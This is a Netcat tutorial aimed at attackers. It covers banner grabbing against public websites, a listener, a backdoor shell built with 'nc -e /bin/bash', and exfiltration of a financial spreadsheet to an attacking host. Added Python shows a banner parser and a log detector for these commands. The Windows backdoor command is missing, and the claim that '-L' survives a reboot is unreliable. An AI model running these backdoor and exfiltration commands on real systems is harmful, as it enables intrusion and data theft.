ncat
Netcat (Ncat) is a little-known yet powerful tool designed to make raw socket connections to network ports. It is a small tool that runs from a single executable file, which is easily transferred to a system and can be renamed to anything to hide it within an operating system. Ncat will call back to an attacking server with only user-level access. Ncat is an open source application from insecure.org, the same fine folks who maintain Nmap. Ncat and its older cousin, nc, both come installed on Kali, and Ncat is bundled with any install of Nmap.
As mentioned above, there are two versions of Netcat. The older version's executable is nc, and it will also make raw socket connections to any TCP/UDP port:
1) Open Netcat's Help Screen
Once we've fired up our Kali Linux system and opened a terminal, we can use Netcat from any directory, since it's located in our bin directory, which is in our PATH variable by default. So, let's type nc -h to see its help page.
2) Get the Basic Syntax Down
As you can see from the help screen above, the basic syntax for Netcat is the following. (Substitute ncat for nc if using Ncat instead of Netcat. We will just be using nc for the rest of this guide.)
To connect to another machine:
nc <options> <host-IP-address> <port>
To listen for inbound connections:
nc -l -p <port>
3) Use Netcat to Connect to a Remote System
Let's go ahead and use Netcat to connect to a remote system. In this case, we will try to connect to a web server on port 80.
nc 192.168.1.105 80
That command gives us a TCP connection (the default) to the web server on port 80 at 192.168.1.105. Now, whatever we type will be sent directly to the web server when we hit enter.
4) Use Netcat to Banner Grab for OS Fingerprinting
Before attacking any system, we need to know as much as possible about the target. So, once we have a TCP connection to a web server, we can use Netcat to grab the banner the web server serves up to new connections, to identify what web-serving software the target is running.
A banner grab against the web server can be done with the HEAD / HTTP/1.0 request. Be careful to copy it exactly as is, with the slashes and spaces. Alternatively, if this doesn't work, you can try HEAD / HTTP/1.1 instead.
HEAD / HTTP/1.0
Hit enter a few times and the web server will respond with its banner, telling us exactly what software it is running. In this case, we can see that the web server is running Microsoft's IIS 7.5.
HTTP/1.1 200 OK
Content-Length: 998
Content-Type: text/html
Content-Location: http://192.168.1.105/index.html
Last-Modified: Wed, 26 Sep 2018 17:59:41 GMT
Accept-Ranges: bytes
Etag: "e245c46986ecc61:93f"
Server: Microsoft-IIS/7.5
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 08 Dec 2018 02:14:35 GMT
Conection: close
We can use this technique on other public websites as well. Let's try it on some widely known sites and see what web server software they're running.
First, let's try this website, wonderhowto.com. When we ping wonderhowto.com, we see that its IP address is 104.193.19.59. So, we throw that into the command, then, after getting a connection, we grab the web server banner. Remember to hit enter two or three times. As we can see, wonderhowto.com is running its own WonderHowTo server.
nc 104.193.19.59 80
HEAD / HTTP/1.0
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 141
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://wonderhowto.com/
Server: WonderHowTo
X-UA-Compatible: IE=Edge,chrome=1
X-Server-Name: APP01
X-Content-Type-Options: nosniff
Date: Sat, 08 Dec 2018 02:19:08 GMT
Connection: keep-alive
But that doesn't seem right. Let's try again with HEAD / HTTP/1.1 instead. As seen below, we
get a bad request but do see that Microsoft-HTTPAPI/2.0 shows up, which is a
common reading when the actual server is a Microsoft-IIS version.
nc 104.193.19.59 80
HEAD / HTTP/1.1
HTTP/1.1 400 Bad Request
Content-Length: 334
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 08 Dec 2018 03:04:29 GMT
Connection: close
If we try the same thing with ebay.com, we get the results below. As you can see, it runs on an Apache-Coyote/1.1 server.
nc 66.135.209.52 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: 49c752f2ba437586596f602605cb5820
Last-Modified: Fri, 8 Dec 2018 01:48:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 857
Date: Sat, 08 Dec 2018 02:38:44 GMT
Connection: keep-alive
Go ahead and try it on other websites and find out what server they're running. However, note that it may not work for all sites, or you may not see the server information.
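As an added example (not code from the original guide), the following Python does the same HEAD-based banner grab from a socket and parses the raw responses shown above so the Server header can be pulled out automatically, which is handy for checking what your own servers advertise. It also shows why the bare HEAD / HTTP/1.1 attempt above came back 400: HTTP/1.1 requires a Host header, which the typed request does not send. The sample responses are trimmed copies of the ones above, and the names build_head_request, parse_banner and grab_banner are chosen here.

```python
import socket

# Trimmed copies of two responses shown above (constructed sample input).
IIS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 998\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "\r\n"
)
BAD_REQUEST = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "Connection: close\r\n"
    "\r\n"
)

def build_head_request(host: str, version: str = "1.0") -> bytes:
    """The request typed into nc above. HTTP/1.1 requires a Host header,
    which is why the bare 'HEAD / HTTP/1.1' attempt above returned 400."""
    lines = [f"HEAD / HTTP/{version}"]
    if version == "1.1":
        lines += [f"Host: {host}", "Connection: close"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

def parse_banner(raw: str) -> dict:
    """Split a raw HTTP response into its status code, Server header
    (None when the server does not advertise one) and all headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": status, "server": headers.get("server"), "headers": headers}

def grab_banner(host: str, port: int = 80, version: str = "1.0",
                timeout: float = 5.0) -> dict:
    """Same exchange as 'nc host 80' followed by HEAD, done with a socket."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_head_request(host, version))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_banner(b"".join(chunks).decode("latin-1"))
```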
Now, let's use Netcat to create a listener on the remote system. Let's assume that we have a Windows server on which we have installed Netcat. We can now type the following to open a Netcat listener on port 6996 (it can be any port) on that system.
nc -l -p 6996
This has created a "listener" that we can connect to at our leisure.
C:\>nc -l -p 6996
Note that on Windows systems, we can run this same command with an upper case L to create a persistent listener that will open up even if the system is rebooted.
6)
Now, let's create a backdoor on the target system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.
For Windows, we use:
For Linux, it's:
nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system.
Next, on our attacking system, we type the following one-liner. As you can see, the Windows command prompt has been piped through our Netcat connection directly to our attacking system. We own that box!
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>
7) Copy Files Out (Exfiltrate) from the Target
Netcat can also be used to exfiltrate files and data from the target. Let's imagine that there's data on the target system that we want, maybe financial data or data stored in a database. We can use a stealth connection to slowly copy that data out to our attack system. In this example, we will exfiltrate a file called financialprojections.xls, presumably an Excel file with financial projections.
From the source system, we type:
type financialprojections.xls | nc 192.168.1.104 6996
That command says to display the file financialprojections.xls, then pipe (|) it to Netcat (nc), which sends it to IP address 192.168.1.104 on port 6996.
C:\>type financialprojections.xls | nc 192.168.1.104 6996
From the destination system, we type:
nc -l -p 6996 > financialprojections.xls
That command says to create a listener (-l) on port (-p) 6996, then redirect the data received on this listener into a file named financialprojections.xls.
We can see in the output below, after running ls -l, that the file was copied across our Netcat connection over port 6996 to our attacking machine!
ls -l
total 356
drwxr-xr-x 2 root root   4096 2011-05-07 11:46 Desktop
-rw-r--r-- 1 root root    141 2013-09-18 12:25 financialprojections.xls
-rw-r--r-- 1 root root    192 2013-09-02 13:49 replay_arp-0902-133213.cap
-rw-r--r-- 1 root root      0 2013-09-02 16:08 snortlog
-rw-r--r-- 1 root root 338111 2013-09-02 13:49 WEPcrack-01.cap
-rw-r--r-- 1 root root    575 2013-09-02 13:49 WEPcrack-01.csv
-rw-r--r-- 1 root root    582 2013-09-02 13:49 WEPcrack-01.kismet.csv
-rw-r--r-- 1 root root   3660 2013-09-02 13:49 WEPcrack-01.kismet.netxml
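As an added detection example (not part of the original guide), the following Python flags the command lines used in the listener, backdoor and exfiltration steps above when they show up in process-creation logs: a plain netcat listener, a listener with the exec option that pipes a shell, and data piped into netcat. It goes slightly beyond the guide by also recognising ncat and nc.exe invocations. The log line format, the host and user names, and the helper names classify_command and scan_logs are assumptions made here.

```python
import re
import shlex

# Constructed process-creation log lines (not real telemetry). The commands
# mirror the ones in this guide plus two benign invocations.
SAMPLE_LOGS = [
    "2018-12-08T02:14:00Z host=kali user=root cmd='nc -h'",
    "2018-12-08T02:14:35Z host=kali user=root cmd='nc 192.168.1.105 80'",
    "2018-12-08T02:30:00Z host=win01 user=bob cmd='nc -l -p 6996'",
    "2018-12-08T02:31:10Z host=web02 user=www-data cmd='nc -l -p 6996 -e /bin/bash'",
    "2018-12-08T02:40:05Z host=win01 user=bob cmd='type financialprojections.xls | nc 192.168.1.104 6996'",
]

NC_NAMES = {"nc", "ncat", "netcat"}
# nc/ncat options that run a program on connect (the -e used in the guide).
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
LINE_RE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) cmd='(?P<cmd>[^']*)'")

def classify_command(cmd: str) -> list:
    """Return findings for one command line (empty list = nothing notable).
    Name matching misses a renamed copy (the guide notes nc can be renamed),
    so pair this with hash-based or network-connection telemetry."""
    findings = []
    # Examine each pipeline stage so 'type file | nc ip port' is caught.
    # posix=False keeps Windows backslash paths intact.
    stages = [shlex.split(s, posix=False) for s in cmd.split("|")]
    for i, argv in enumerate(stages):
        if not argv:
            continue
        name = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name.endswith(".exe"):
            name = name[:-4]
        if name not in NC_NAMES:
            continue
        flags = set(argv[1:])
        if flags & EXEC_FLAGS:
            findings.append("backdoor shell: netcat with exec option")
        elif "-l" in flags or "-L" in flags:
            findings.append("netcat listener")
        if i > 0:
            findings.append("possible exfiltration: data piped into netcat")
    return findings

def scan_logs(lines):
    """Yield (host, user, cmd, findings) for each log line with a finding."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            findings = classify_command(m["cmd"])
            if findings:
                yield m["host"], m["user"], m["cmd"], findings
```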
This is just a small sample of what this powerful little program can do. When you combine it with some basic scripting skills, you can only imagine the incredible things that can be accomplished.